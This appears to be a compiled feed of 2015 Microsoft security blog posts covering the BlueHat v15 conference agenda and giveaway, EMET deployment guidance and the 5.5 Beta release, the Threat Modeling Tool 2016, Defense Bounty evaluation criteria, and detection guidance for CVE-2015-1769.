Microsoft SmartScreen integrated with Internet Explorer, Microsoft Edge, and Windows, has helped protect users from socially engineered attacks such as phishing and malware downloads since the release of Internet Explorer 7. Over time, SmartScreen reputation checks on URLs and SmartScreen Application Reputation protection in the browser and in Windows have significantly changed the socially engineered attack landscape, leaving such attacks at historic lows. However, attackers have continued to adapt—enter Exploit Kits (EKs), one of the fastest growing threats online.

EKs often originate on trusted websites and target vulnerabilities in software used by our customers every day. Moreover, EK-based attacks do not require any user interaction—there's nothing to click, nothing to download—and infection is invisible. Approximately two-thirds of new malware is now being delivered by EKs, hardly surprising given that a single EK on a popular site can infect thousands of people in less than an hour. The recently analyzed Angler EK, for instance, was found to target almost 90,000 innocent victims each day, earning cyber criminals potentially more than $30 million annually and further proving the EK space to be an extremely financially lucrative one. But all isn't lost! Starting with the November release of Windows 10, Microsoft SmartScreen will begin protecting users from EK attacks in Internet Explorer and Microsoft Edge. In this talk, we will discuss the growing EK landscape, how it is impacting our customers, and how, with new synchronous blocks for EKs, SmartScreen once again aims to continue increasing the cost of exploitation for attackers.

4:00-4:50 PM | Mark Novak and Dave Probert |Microsoft          
Virtual Secure Mode and Shielded Virtual Machines

Virtual Secure Mode is a new virtualization-assisted security technology that made its debut in Windows 10.  This talk will describe the fascinating security properties of VSM as well as cover the two new technologies that were built with its help: shielded virtual machines and Credential Guard. Microsoft developers interested in utilizing VSM in their projects should talk to folks in the WDG.

Wednesday, January 13th, 2016 | General Audience  


9:00-9:50 AM |Nils Sommer|Bytegeist
Windows Kernel Fuzzing

Attackers often rely on Windows kernel vulnerabilities to break out of application sandboxes and escalate privileges. To rapidly identify such vulnerabilities, we adapted techniques from browser fuzzing to assess the kernel and have reported a number of critical issues to Microsoft. All aspects of the fuzzer, from test case generation to testcase minimisation are highly distributed and it produces high quality testcases for reproduction. This talk will discuss our approach for fuzz testing the Windows kernel, from assessing the kernel's attack surface and effective test case generation, to the design and architecture of a highly distributed fuzzer that scales to many hundreds of CPU cores.

10:00-10:50 AM | Leigh Honeywell and Ari Rubinstein | Slack   
Secure Development for Snake People: New Ideas for the Next Generation

Startups hear the word “process” and freak out – shipping code every day isn’t optional. What if you could build a secure development process that accelerated development, instead of slowing it down? At Slack, we have – allowing our small team to distribute security work to developers, and building up their security skills from intern to senior engineer. We’ll talk through the tools and processes we built – a flexible, open source framework including a lightweight self-service assessment tool, a checklist generator, and most importantly a chat-based process. Together, these encourage security thinking in the tools developers already spend their time in – allowing us to effortlessly document people’s thought processes around risk. By empowering developers to think about security themselves and incorporate secure practices into their own teams and workflows, we’ve defeated the fear of the checkbox and replaced it with new tooling and process that teams actually want to work with.

11:00-11:25 AM | Jason Shirk|Microsoft             
Microsoft Bounty Program: Making it to the MSRC Top 100

Microsoft has been working with security researchers for a long time as part of a robust security regimen, which we continue to value and drive passionately. Bug bounties are an increasingly important part of the vulnerability research and defense ecosystem. We believe that bounties will continue to evolve over time, and will be regularly managing the Microsoft Bounty Programs. In this talk Jason will be talking about what we've seen to date, what we've learned, and diving more deeply into the data behind running the Bug Bounty Programs at Microsoft.

11:30-11:55 AM | Eugene Bobukh|Microsoft    
Transcending Threat Modeling Limitations

Threat Modeling as we know it today has inherent scalability limitations. It can be shown that its computational complexity is O(N^2) with respect to the number of elements modeled. In everyday practice that places an upper limit for human driven threat modeling at approximately 20 elements. However, contemporary software is significantly more complex, consisting of thousands of logical components. What options are available to transcend that limitation? In this talk we shall explore some experimental approaches for scalable threat modeling.


1:00-1:50 PM | Anna Chung | Uber
The Glocalization of the Underground Market

Start with a general introduction of Chinese speaking cyber crime underground market, this presentation aims to discuss how international hacking tools and compromised data being used by financially motivated criminals, and what kind of adjustments were made in order to localize the business model. The talk would use cyber crime activities targeting Japanese online banking system and possibly the spread of DDoS web-based DDoS tools to explain the glocalization status in Chinese underground economy.

2:00-2:50 PM | Nicolas Joly |Microsoft

Although Windows has a long history of vulnerabilities and exploit techniques, Windows Phone OS has proven to be much harder to exploit than its cousin. Low market share, little public research, high focus on IOS and Android, but also strong security policies made that target highly resistant to massive pwnage. But as often happens with exploits, a good vulnerability such as a write-what-where condition is usually enough to defeat all mitigations in place. Based on research conducted for mobile Pwn2Own 2014, this talk will depict the road taken to get a working exploit for Internet Explorer Mobile running on WP 8.1.

3:00-3:50 PM | Kostya Kortchinsky | Google
VMware Workstation Escape: the Virtual Printer Case

VM Escapes, or how to execute code on the Host OS from a Guest. While they are not a new concept, they are increasingly attractive as virtualization expands, in the datacenters and elsewhere.
This presentation, focusing on VMware Workstation, will demonstrate how arbitrary code execution in the Host was achieved from the Guest through memory corruption vulnerabilities in VMware Workstation Printer Virtualization.
I will cover the virtual printer protocol, how to fuzz it, the vulnerabilities uncovered (through fuzzing and reading the assembly code), and finally walk through a fully working exploit for Workstation 11.1.0 on a Windows 8.1 Host.


4:00-4:50 PM | Matt Miller and David Weston | Microsoft
The Cutting Edge of Web Browser Exploitation

Web browsers are the primary portal to the Internet for most people and it is no surprise that they continue to be one of the most preferred infection vectors for targeted and large scale attacks in-the-wild. Over the past few years, Microsoft has observed some significant changes in the trends related to how browser-based vulnerabilities are discovered and exploited in practice. In this presentation, we will explore these trends and dig into the technical details of how browser-based vulnerability exploitation has changed over the past 15 years. We will show how Microsoft has responded to these changes in the threat landscape by showcasing some of the major security investments that have been made in Windows, Internet Explorer, and the Microsoft Edge browser. We will provide an objective assessment of the impact that these investments have had thus far and explain how these hardening measures, particularly in the Microsoft Edge browser, have significantly affected the playbook that attackers have developed for exploiting browser-based vulnerabilities.


**PLEASE NOTE: This schedule may be subject to change but we will endeavor to keep the final schedule as close as possible to what appears here.



BlueHat v15 End-of Event Survey Give-Away Rules

At the end of each conference day, please ensure you complete the End-of-Event survey located at:  

As part of the Microsoft BlueHat BlueHat v15 Conference, Microsoft will conduct a give-away of prizes described in the prizes section below. A reconciliation of attendees and end of event survey completions will occur to determine eligible participants. Any duplications will be removed as only one entry per person is allowed. A random drawing by a disinterested party will occur based the list of eligible personnel who have submitted their end of event surveys by Midnight on 1/18/2016. All decisions regarding winners by the event organizers are final.

Prizes: As part of the BlueHat Conference, Microsoft will select one individual to receive a Microsoft Xbox One valued at $399 and 10 individuals to receive a Starbucks gift card valued at $10 each.

Eligibility: The give-away is open to all the BlueHat v15 attendees (to External attendees, Microsoft FTEs and Interns, and Contingent Staff) who attend the conference either in person or via Live Streaming, and COMPLETE the End of Event Surveys. Personnel who are unable to attend due to technical issues, geography, or other events that prohibit attendance are not eligible. Additionally, personnel who view only the On Demand videos after the event and event organizers are not eligible.

Any questions regarding this give-away should be sent to

BlueHat v15 Give-Away Winners

Microsoft Xbox One Winner

Christian Kuhtz

$10 Starbucks Gift Card Winners
Rich Eicher
Nate Warfield
Marius Bunescu
Max Poliashenko
John Bambenek
Roman Golovin
Samuel Jenkins
Neil Coles
Chris Kaler
Angie Wilson

BlueHat v15 Full Agenda_Jan12-13.pdf

EMET: To be, or not to be, A Server-Based Protection Mechanism, 20 Oct 2015 15:27:00 +0000 Folks – Platforms PFE Dan Cuomo here to discuss a common question seen in the field:

“My customer is deploying EMET and would like to know if it is supported on Server Operating Systems.”

On the surface there is a simple answer to this question, however with a little poking, a little prodding, the question quickly becomes:

“Does EMET protect Server workloads?”

This is a more complicated question that usually incurs some email-based eye-rolling when we tell them, like most questions, “It depends.”  They really didn’t mean to ask that question either and so after some more poking, and some more prodding, a number of different questions are uncovered, all of which require a little more analysis than the typical “YES” or “NO” question.  So in the next few paragraphs we’ll discuss the reasons for this question, and how to have this conversation with decision makers in the organization.

Is EMET Supported on Server Operating Systems?

The simple answer to the server support question is an emphatic “YES!”  As you can see in the EMET support article (summary below), EMET 5.2 can be installed on most currently supported operating systems (as of the writing of this article) and their derivatives.  For example, the Client OS’ 7, 8, and 8.1 are all supported as are the Server OS’ 2008, 2008 R2, 2012, and 2012 R2. (Note that EMET 5.5 Beta provides support for Windows 10)

Operating System (min supported) 

EMET 5.2 


Windows 10 


Windows 8.1 


Windows 8  


Windows Server 2012 R2 


Windows Server 2012 


Windows 7 Service Pack 1  


Windows Server 2008 R2 Service Pack 1  


Windows Server 2008 Service Pack 2  


Windows Vista Service Pack 2  




[Short and Sweet]:

Q: Is EMET Supported on server Operating Systems?

A: Yes, EMET is supported on currently supported server Operating Systems

Can EMET Protect My Legacy Server Operating Systems?

One reason customers consider deploying EMET is to protect their legacy systems such as Windows XP (EoL: April 8th, 2014) and Server 2003 (EoL: July 14th 2015).  Many customers may still be wondering if they really need to migrate or event how to get started.  This link and this Tech Ed video It’s the End of the World As You Know It…Windows Server 2003 End of Life will give you a bunch of great information.  If you want the Cliffsnotes, yes you REALLY need to migrate; one thing you won’t find on this page is a link to download EMET.

You may be wondering if you can avoid migrating a legacy system to a newer, supported operating system if you install EMET.  The absence of EMET from the prior links as well as this video  should make it abundantly clear that that the answer is “NO.”  You still need to migrate off of the legacy operating systems.  In addition, once the server operating systems goes out of support, EMET is no longer supported on that platform.  For example, now that we’ve passed July 14th, any remaining 2003 systems in your enterprise are no longer supported.  Likewise, the EMET application on those systems is also unsupported.

EMET primarily mitigates user-mode application exploits that target applications like Microsoft Office, Internet Explorer, and Adobe Acrobat.  As such, it may provide some additional protection while you’re migrating, however it will not protect you against all exploits targeted at this legacy platform and it is certainly not a long-term “silver-bullet” to enterprise security.  Your safest course of action is to upgrade those legacy systems to a newer, supported operating system.

Note: Having just read that the last sentence, many of you are currently misinterpreting what I said as proof that you don’t really need to upgrade if you have a mission critical application that only runs on a legacy OS.  STOP IT!!!

All joking aside, I will tell you that nearly every customer I have encountered thinks they’re the exception to the rule.  In reality, there are few actual exceptions.  If you don’t know what to do or how to get started, I implore you to contact us to see how we can help you.

[Short and Sweet]:

Q: Will EMET protect your legacy operating system?

A: Nope.  While EMET could mitigate some potential vulnerabilities on a legacy system, it should not be considered a long-term alternative to migrating to a support OS.

What should I protect with EMET?

OK, let’s recap.  We now know EMET can be installed on supported server operating systems.  In addition, it can provide some level of protection while you’re migrating off a legacy OS.  But what applications should you configure EMET to protect in these environments?

When considering an application protection strategy, keep in mind that “agents” are most likely already sprawling throughout your enterprise, consuming valuable system resources.  I’ve regularly heard customers say, “Not another agent!?”  With this in mind, focus on a risk-management based approach.  This would include applications that are:

1)      Most likely to be exploited

2)      Consuming content from external or untrusted sources

Most likely to be exploited:

In addition to being the least desirable high school yearbook award, this category describes applications that are highly targeted by attackers.  This often boils down to the widespread use of an application.  Protecting applications that attackers believe yield a high reward (for example, those that affect many people) should be considered essential.

An example of this would be Microsoft Word or Adobe Acrobat.  Both of these applications have a large user base.  An attacker would know that if successful, the exploit would affect many customers.  In contrast, an exploit that targets a “home-grown” LOB application would yield a low-reward.

Applications consuming content from external or untrusted sources

This category describes applications that consume or access content from an external or untrusted source such as the internet.  For example, both Microsoft Word and Adobe Acrobat handle “untrusted” content when a user downloads and opens *.docx or *.pdf from the internet.  However, opening *.docx or *.pdf from an intranet SharePoint site is of low risk.  Another example would be any web browser that has access to the internet.

When you first configure EMET you’re greeted with the wizard shown below:

If you select the option to “Use Recommended Settings” (shown above), you are among other things, configuring EMET to use the “Recommended Software.xml” protection profile included with the installer.  The included applications (shown below) are recommended by the EMET Product Group and have gone through testing to verify that, by-and-large, the mitigations selected will reduce the number of false-positives and incompatibilities incurred with EMET.

Note: False-positives and incompatibilities are likely to occur as many applications make use of the exact behavior that the mitigations intend to block.  Please review EMET mitigation guidelines for a list of known application mitigation compatibility issues. 

Please also review Kurt Falde’s article on Troubleshooting an EMET Mitigation Application Crash for information on what to do when you find an incompatible application mitigation.

It is imperative to thoroughly test your configuration making sure that the pilot contains a good representation of target systems.  For example, make sure to include all necessary plug-ins or add-ins to applications that will be encountered in the enterprise for both client and server operating systems.

The included protection profiles are great low-risk way to get started.  These profiles contain the “low-hanging fruit” and provide the biggest gains.  The applications included in the recommended software protection profile (shown below) cover a range of popular applications and those that consume external or untrusted content.

The popular protection profile is a superset of the recommended protection profile.  It adds a number of additional applications that fit the same bill.  Once you’ve tested the applications in the recommended list, test the applications in the popular list against a group of machines that are representative of your target environment.

[Short and Sweet]:

Q: What should you protect with EMET?

A: Stick to the applications in the recommended and popular protection profiles.  These include applications that have been tested, are widespread, and may handle external or untrusted content.

What about generic Microsoft processes?

Nope.  Technically speaking, you can ask EMET to protect any application that runs on a system.  However, keep in mind that these additional applications have not been tested and may not behave as expected.  We specifically call this out in the EMET mitigations guidelines, “System and network services are also out-of-scope for EMET. Although it is technically possible to protect these services by using EMET, we do not advise you to do this.”

This includes servers that you really care about, like domain controllers.  Between you and me, if you’re thinking about protecting LSASS.EXE or MSExchangeIS.exe, this is what we in “the biz” call an “RGE” (resume generating event).  Put down the mouse and step away slowly…

[Short and Sweet]:

Q: What about generic Microsoft processes?

A: Nope, stick to the applications in the recommended and popular profile lists.

What else should I consider?

Some of you savvy readers out there are probably saying to yourself,

“Now hold the phone, Dan.  We follow pretty stringent guidelines about what does or does not get installed on servers.  We have enforced rules that prevent the installation of the applications listed in the protection profiles.”

“In fact, we even make sure that administrative users are unable to reach the internet from servers.  We’re confident that none of the applications you spoke of previously will reach our servers.

Before completely discarding EMET, it’s important to note that EMET does provide other capabilities that you may be able to leverage, such as certificate trust pinning.  However, if you can honestly tell me that there is no way that those applications will get installed on your systems and that they can never come in contact with untrusted content, you may not need EMET on your servers.  On a side-note, if you’re looking for a PFE, I know someone who would love to work in an environment like that J

It’s to these customers I usually recommend a Microsoft Security Risk Assessment (#ShamelessPlug) or other security assessment that helps make sure that your perception is reality.  Some of the best advice I’ve been given is, “trust, but verify.”

In contrast, perhaps your team is just too big, or too widespread.  Maybe you don’t have the necessary process, procedure, or technology to eliminate this risk in your server environment.  In cases like these I would advise rolling out EMET to your server infrastructure as well.

[Short and Sweet]:

Q: What else should I consider?

A: Look at your IT team structure.  Review your processes and procedures.  Have a third party look at them.  Verify EMET can’t help you before you decide you don’t need it!


As you have now seen, this seemingly simple question spirals into a complicated one very quickly.  EMET is supported on servers, and can be used to enhance security across a wide range of platforms.  Use the built-in protection profiles as a baseline and thoroughly test your target systems prior to deployment.

Lastly, if your technology, process, and procedures for server security are foolproof, then feel free to focus your efforts elsewhere.  Otherwise consider EMET part of your IT security “flu-shot.”  Take the time now and roll it out before you have a problem.

Thanks for reading,

Dan Cuomo


Enhanced Mitigation Experience Toolkit (EMET) version 5.5 Beta is now available, 15 Oct 2015 16:13:23 +0000 Mitigation Experience Toolkit (EMET) version 5.5 Beta is now available

The Enhanced Mitigation Experience Toolkit (EMET) benefits enterprises and all computer users by helping to protect against security threats and breaches that can disrupt businesses and daily lives. It does this by anticipating, diverting, terminating, blocking, or otherwise invalidating the most common actions and techniques adversaries might use to compromise a computer. In this way, EMET can help protect your computer systems even from new and undiscovered threats before they are formally addressed by security updates and antimalware software.

EMET 5.5 Beta release includes new functionality and updates from EMET 5.2, including:

  • Windows 10 compatibility
  • Better configuration of various mitigations via GPO
  • EAF/EAF+ pseudo-mitigation performance improvements
  • Support for Windows 10’s new Untrusted font mitigation
  • Various bug fixes


Benefits of EMET

Helps raise the bar against attackers. EMET helps protect against new and undiscovered threats even before they are formally addressed through security updates or antimalware software. EMET includes many security mitigations that complement other defense in-depth security measures, such as Windows Defender and antivirus software. EMET installs with default protection profiles, which are XML files that contain preconfigured settings for common Microsoft and third-party applications.

Works well for the enterprise. Enterprise IT professionals can easily deploy EMET through Microsoft System Center Configuration Manager and apply Group Policies in Windows Active Directory to comply with enterprise account, user, and role policies. EMET is highly customizable and administrators can choose which applications to protect with each mitigation technique.

EMET can even provide mitigation protections for legacy enterprise software that cannot easily be rewritten, or where the source code is not available.

The reporting capabilities in EMET are provided through a component called the EMET Agent, which allows enterprises to create logs and notifications for audit purposes. EMET customer support is available through Microsoft Premier Support Services. For more information on deploying EMET, visit the EMET Knowledge Base Article: KB2458544

Helps protect in a wide range of scenarios. EMET works for a range of Windows client and server operating systems and is compatible with most commonly used third-party applications, from productivity software to music players. When users browse secure HTTPS sites on the Internet or log on to popular social media sites, EMET can help further protect by validating Secure Sockets Layer (SSL) certificates against a set of administrator-defined rules.

Security mitigation technologies are designed to make it more difficult for an attacker to exploit vulnerabilities in a given piece of software. EMET enables customers to leverage these security mitigation technologies on their systems and provides several unique benefits:

No source code needed: EMET enables administrators to apply several of the available mitigations built-in to Windows (such as Data Execution Prevention) for individual applications without recompilation. This is especially useful for deploying mitigations on legacy software that was written before the mitigations were available, or when source code is not available.

Highly configurable: EMET provides a high degree of granularity by allowing mitigations to be individually applied on a per process basis. There is no need to enable the mitigations on an entire product or suite of applications. This is helpful in situations where a process is not compatible with a particular mitigation technology. When that happens, the administrator can simply turn that mitigation off for that process.

Helps harden legacy applications: It’s not uncommon to have a hard dependency on old legacy software that cannot easily be rewritten and needs to be phased out slowly. Unfortunately, this can easily pose a security risk as legacy software is notorious for having security vulnerabilities. While the real solution to this is migrating away from the legacy software, EMET can help manage the risk while this is occurring by making it harder for hackers to exploit vulnerabilities in the legacy software.

Helps verify SSL certificate trust while surfing websites: Given the increase in incidents of Certificate Authorities allowing the creation of fraudulent SSL certificates used to perform man-in-the middle attacks, EMET offers the possibility to enforce a set of pinning rules that can verify SSL certificates of specified domains against their issuing Root CA (configurable certificate pinning).

Allows granular plugin ‘deny list’ within applications: Modules and plugins, when loaded into an application, can increase its exposure to vulnerabilities and, consequently, to potential attacks. EMET addresses this by allowing the administrator to create ‘deny lists’ to prevent unwanted modules and plugins from loading within an application.

Ease of use: The policy for system wide mitigations can be seen and configured with EMET's graphical user interface, the command line tool or via Group Policy. There is no need to locate and decipher registry keys, or run platform dependent utilities. With EMET it is possible to adjust settings with a consistent interface regardless of the underlying platform.

The toolkit includes several pseudo mitigation technologies aimed at disrupting current exploit techniques. These pseudo mitigations are not robust enough to stop future exploit techniques, but can help prevent systems from being compromised by many of the exploits currently in use. The mitigations are also designed so that they can be easily updated as attackers start using new exploit techniques.

Mitigations in Windows 10

One of EMET’s original goals was to be a testbed for mitigations to add to the operating system. With Windows 10 we have implemented many features and mitigations that can make EMET unnecessary on devices running Windows 10. EMET is most useful to help protect down-level systems, legacy applications, and to provide Anti-ROP protection for 3rd party software that may not yet be recompiled using CFG.

Some of the Windows 10 features that provide equivalent (or better) mitigations than EMET are:

Device Guard: Device Guard is a combination of enterprise-related hardware and software security features that, when configured together, will lock a device down so that it can only run trusted applications. Device Guard provides hardware-based zero day protection for all software running in kernel mode, thus protecting the device and Device Guard itself from tampering, and app control policies that prevent untrusted software from running on the device.

Control Flow Guard (CFG): As developers compile new apps, CFG analyzes and discovers every location that any indirect-call instruction can reach.  It builds that knowledge into the binaries (in extra data structures – the ones mentioned in a dumpbin/loadconfig display).  It also injects a check, before every indirect-call in your code, that ensures the target is one of those expected, safe locations.  If that check fails at runtime, the operating system closes the program.

AppLocker: AppLocker is an application control feature introduced in Windows 7 that helps prevent the execution of unwanted and unknown applications within an organization's network while providing security, operational, and compliance benefits. AppLocker can be used in isolation or in combination with Device Guard to control which apps from trusted publishers are allowed to run.

For more information on Windows 10 security features please review the Windows 10 Security overview whitepaper on TechNet.

EMET 5.5 Beta and Edge

Given the advanced technologies used to protect Microsoft Edge, including industry leading sandboxing, compiler, and memory management techniques, EMET 5.5 mitigations do not apply to Edge.


We welcome feedback via Microsoft Connect.

Install EMET 5.5 Beta today!

We want to particularly thank FireEye for partnering with us.


Announcing BlueHat v15 Conference, 14 Oct 2015 15:33:22 +0000 are happy to announce the 15th version of the Microsoft BlueHat Security Conference set for January 12-13, 2016.  The annual security conference brings internal and external speakers to educate and engage Microsoft’s engineering community and their executives.  Work is under way currently to set the schedule for this event.  Attendance at BlueHat is open to Microsoft full time employees, contingent staff, and invited researchers, luminaries, partners, and customers.

Call for Papers

The Content Advisory Board invites thought leaders, security experts, and partners to submit original and challenging content for the security conference.  From your research to perspectives and ideas we are looking for content that will engage the engineering focused audience and executives.  We particularly invite submissions that have specific calls to action.  This year we would like to focus content around the following topics:

  • Public, Dedicated, or Hybrid Cloud service security

  • Mobile Application Security

  • Advanced Persistent Threats & Threat Intelligence

  • Mitigation and Sandbox Escapes or Defenses

  • Authentication Technologies

  • Consumer Privacy

  • New Attack Surface Areas

A limited number of presentation spaces are available and all submissions will be reviewed by the Content Advisory Board on a rolling basis until all talk slots are filled.  We ask that all submissions be presented in abstract form no later than October 31st.  Deadlines for full content will be later in December.  Presentations should target 30 or 60 minute format with no more than three speakers specified.  Some presentations will be selected to present to Microsoft executives in a smaller format in addition to the large format at the event.  Speakers will be informed of their acceptance via email.

Submit your presentation abstracts to to be considered as a potential BlueHat speaker!

Conference Registration

Attendance at BlueHat v15 Conference is by invitation only. All invited attendees will receive an email with registration link and conference agenda in November.

What’s New with Microsoft Threat Modeling Tool 2016, 08 Oct 2015 02:02:27 +0000 more »]]>Threat modeling is an invaluable part of the Security Development Lifecycle (SDL) process. We have discussed in the past how applying a structured approach to threat scenarios during the design phase of development helps teams more effectively and less expensively identify security vulnerabilities, determine risks from those threats, and establish appropriate mitigations.

The Microsoft Threat Modeling Tool 2016 is a free tool to help you find threats in the design phase of software projects. It’s available as a free download from the Microsoft Download Center. This latest release simplifies working with threats and provides a new editor for defining your own threats. Microsoft Threat Modeling Tool 2016 has several improvements.

  • New Threat Grid
  • Template Editor
  • Migrating Existing Data Flow Diagrams

New Threat Grid

The threat grid has been overhauled. Now you can sort and filter on any column. You can easily filter the grid to show threats for any flow. You can sort on the interaction column if you want to group all the threats for each flow. You can sort on the changed by column if you want to find that threat you just edited.

Template Editor

Microsoft Threat Modeling Tool 2016 comes with a base set of threat definitions using STRIDE categories. This set includes only suggested threat definitions and mitigations which are automatically generated to show potential security vulnerabilities for your data flow diagram. To offer more flexibility, Microsoft Threat Modeling Tool 2016 gives users the option to add their own threats related to their specific domain. This means users can extend the base set of threat definitions using the template editor.

The template editor also allows users to modify the stencils available on the drawing surface.  If you have a stencil you would like to make available for your DFDs, you can add it.  If you need another stencil property, you can add that.

Migrating Existing Data Flow Diagrams

Threat modeling is an iterative process. Development teams create threat models which evolve over time as systems and threats change. We wanted to make sure the new version supports this flow. Microsoft Threat Modeling Tool 2016 will load any threat model from Microsoft Threat Modeling Tool 2014, in the .tm4 format. Threat models created with v3 version of the tool (.tms format) must be migrated to the Microsoft Threat Modeling Tool 2014 format (.tm4) before they can be loaded in Microsoft Threat Modeling Tool 2016.  Microsoft Threat Modeling Tool 2014 offers a migration tool for threat models created with version 3.1.8. (NOTE: For migrating threat models from v3.1.8 only, Microsoft Visio 2007 or later is required).

Additional Information

We hope these new enhancements in Microsoft Threat Modeling Tool 2016 will provide greater flexibility and help enable you to effectively implement the SDL process in your organization.

Thank you to all who helped in shipping this release through internal and external feedback. Your input was critical to improving the tool and customer experience.

For more information and additional resources, visit:


Alex Armanasu is an Engineer on the Secure Development Tools team at Microsoft. He’s responsible for the Threat Modeling component of the Security Development Lifecycle (SDL).

What makes a good Microsoft Defense Bounty submission?, 08 Sep 2015 09:57:37 +0000 of Microsoft’s longstanding strategies toward improving software security continues to involve investing in defensive technologies that make it difficult and costly for attackers to exploit vulnerabilities. These solutions generally have a broad and long lasting impact on software security because they focus on eliminating classes of vulnerabilities or breaking the exploitation primitives that attackers rely on. This also helps improve software security over the long run because it shifts the focus away from the hand-to-hand combat of finding, fixing, and servicing individual vulnerabilities and instead accepts the fact that complex software will undoubtedly have vulnerabilities.

To further emphasize our commitment to this strategy and to cast a wider net for defensive ideas, Microsoft awarded the BlueHat Prize in 2012 and subsequently started the ongoing Microsoft Defense Bounty in June, 2013 which has offered up to $50,000 USD for novel defensive solutions. Last month, we announced that we will now award up to $100,000 USD for qualifying Microsoft Defense Bounty submissions. This increase further affirms the value that we place on these types of defensive solutions and we’re hopeful this will help encourage more research into practical defenses.

In this blog post, we wanted to take this opportunity to explain how we evaluate defensive solutions and describe the characteristics that we look for in a good defense. There are a few key dimensions that we evaluate solutions based on, specifically: robustness, performance, compatibility, agility, and adoptability. Keeping these dimensions in mind when developing a defense should increase the likelihood of the defense being deemed a good candidate for the Microsoft Defense Bounty and will also go a long way toward increasing the likelihood of the defense being integrated and adopted in practice.

Criteria for evaluating defensive solutions


The first and most important criteria deals with the security impact of the defense. After all, the defense must have an appreciable impact on making it difficult and costly to exploit vulnerabilities in order for it to be worth pursuing.

We evaluate robustness in terms of:

  • The impact the defense will have on modern classes of vulnerabilities and/or exploits.  A good defense should eliminate a common vulnerability class or break a key exploitation technique or primitive used by modern exploits. 

  • The level of difficulty that attackers will face when adapting to the defense.  A good defense should include a rigorous analysis of the limitations of the defense and how attackers are likely to adapt to it. Defenses that offer only a small impediment to attackers are unlikely to qualify.


The second most important criteria deals with the impact the defense is expected to have on performance. Our customers expect Windows and the applications that run on Windows to be highly responsive and performant. In most cases, the scenarios where we are most interested in applying defenses (e.g. web browsers) are the same places where high performance is expected. As such, it is critical that defenses have minimal impact on performance and that the robustness of a defense justifies any potential performance costs.

Since performance impact is measured across multiple dimensions, it is not possible to simply distill the requirements down into a single allowed regression percentage. Instead, we evaluate performance in context using the following guide posts:

  • Impact on industry standard benchmarks. There are various industry standard benchmarks that evaluate performance in common application workloads (e.g. browser DOM/JS benchmarks). Although SPEC CPU benchmarks can provide a good baseline for comparing defense solutions, we find that it is critical to evaluate performance impact under real-world application workloads. 

  • Impact on runtime performance. This is measured in terms of CPU time and elapsed time either in the context of benchmarks or in common application scenarios (e.g. navigating to top websites in a browser). Defenses with low impact on runtime performance will rate higher in our assessment. 

  • Impact on memory performance. This is measured in terms of the how the defense affects various aspects of memory footprint including commit, working set, and code size. Defenses with low impact on memory performance will rate higher in our assessment.


One of the reasons that Windows has been an extremely successful platform is because of the amount of care that has been taken to retain binary compatibility with applications. As such, it is critical that defenses retain compatibility with existing applications or that there is a path for enabling the defense in an opt-in fashion. Rebuilding the world (e.g. all binaries that run on Windows) is not an option for us in general. As such, defenses are expected to be 100% compatible in order to rate highly in our assessment.

In particular, we evaluate compatibility in terms of the following:

  • Binary interoperability. Any defense must be compatible with legacy applications/binaries or it must support enabling the defense on an opt-in basis.  If an opt-in model is pursued, then the defense must generally support legacy binaries (such as legacy DLLs) being loaded by an application that enables the defense. In the case where the defense requires binaries to be rebuilt in order to be protected, the protected binaries must be able to be loaded on legacy versions of Windows that may not support the defense at runtime. 

  • ABI compliant. Related to the above, any defense that alters code generation or runtime interfaces must be compliant with the ABI (e.g. cannot break calling conventions or other established contracts). For example, details on the x64 ABI for Windows can be found here

  • No false positives. Defenses must not make use of heuristics or other logic that may be prone to false positives (and thus result in application compatibility issues).


Given the importance of binary compatibility and the long term implications of design decisions, we also need to take care to ensure that we are afforded as much flexibility as possible when it comes to making changes to defenses in the future. In this way, we pay close attention to the agility of the design and implementation associated with a defense.  Defenses that have good properties in terms of agility are likely to rate higher in our assessment.


All defenses carry some cost with them that dictates how easy it will be to build them and integrate them into the platform or applications. This means we must take into account the engineering cost associated with building the defense and we must assess the taxes that may be inflicted upon developers and systems operators when it comes to making use of the defense in practice. For example, defenses that require developers to make code changes or system operators to manage complex configurations are less desirable. Defenses that have low engineering costs and minimize the amount of friction to enable them are likely to rate higher in our assessment.


The criteria above are intended to help provide some transparency and insight into the guidelines that we use when evaluating the properties of a defense both internally at Microsoft and for Microsoft’s Defense Bounty program. It’s certainly the case that we set a high bar in terms of what we expect from a defensive solution, but we believe we have good reasons for doing so that are grounded both in terms of the modern threat landscape and our customer’s expectations.

We strongly encourage anyone with a passion for software security to move “beyond the bugs” and explore opportunities to invest time and energy into developing novel defenses. Aside from being a challenging and stimulating problem space, there is now also the potential to receive up to $100,000 USD for your efforts in this direction through the Microsoft Defense Bounty program. The impact that these defenses can have on reducing the risk associated with software vulnerabilities and helping keep people safe is huge.

Matt Miller

Microsoft Security Response Center


Defending against CVE-2015-1769: a logical issue exploited via a malicious USB stick, 11 Aug 2015 15:37:20 +0000

Today Microsoft released update MS15-085 to address CVE-2015-1769, an important severity security issue in Mount Manager. It affects both client and server versions, from Windows Vista to Windows 10.

The goal of this blog post is to provide information on the detection guidance to help defenders detect attempts to exploit this issue.


Detection Guidance

As part of the update, we are also shipping an event log to help defenders detect attempts to use this vulnerability on their systems. The event log will be triggered every time a malicious USB that relies on this vulnerability, is mounted on the system. If such an event is recorded, it means that attempt to exploit the vulnerability is blocked. So once the update is installed, companies auditing event logs will be able to use this as detection mechanism.

These events are logged under “System” channel and is reported as an error.

Note: Multiple events may be raised for single exploit attempt.

After installing the update, exploitation attempts will result in the Event (ID:100) generated with MountMgr or Microsoft-Windows-MountMgr, as its source. The CVE associated with this vulnerability will also be logged for further reference. Note that this error code can also be logged in other extremely rare circumstances. So, while there is a very small chance that this event log could be generated in non-malicious scenarios, there is a high probability that an exploitation attempt is the cause of the event.

– Axel Souchet, Vishal Chauhan from MSRC Vulnerabilities and Mitigations Team

Advances in Scripting Security and Protection in Windows 10 and PowerShell V5, 10 Jun 2015 11:25:59 +0000 the last several releases of Windows, we’ve been working hard to make the platform much more powerful for administrators, developers, and power users alike. PowerShell is an incredibly useful and powerful language for managing Windows domains. Unfortunately, attackers can take advantage of these same properties when performing “post-exploitation” activities (actions that are performed after a system has been compromised).

The PowerShell team, recognizing this behavior, have significantly advanced security focused logging and detection in Windows 10 and PowerShell v5. Some capabilities take advantage of new functionality in Windows 10, others are available on Windows 8.1 and Windows Server 2012R2 with KB3000850, and the functionality that is specific to PowerShell v5 will be available on Windows 7 and Windows Server 2008R2 when the next version of the Windows Management Framework is released.

Scripting transparency for Antimalware engines

